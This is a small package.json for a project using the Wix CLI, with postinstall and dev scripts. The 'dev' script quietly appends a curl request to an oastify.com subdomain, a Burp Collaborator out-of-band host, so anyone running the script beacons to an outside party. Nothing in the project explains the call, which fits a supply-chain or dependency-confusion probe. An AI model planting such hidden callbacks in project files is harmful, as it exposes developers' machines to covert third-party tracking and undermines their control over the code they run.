{
  "devDependencies": {
    "@wix/cli": "^1.0.0"
  },
  "scripts": {
    "postinstall": "wix sync-types",
    "dev": "wix dev && curl https://oskungni8ji6c0ks60h1nsnreikc84wt.oastify.com/test"
  }
}
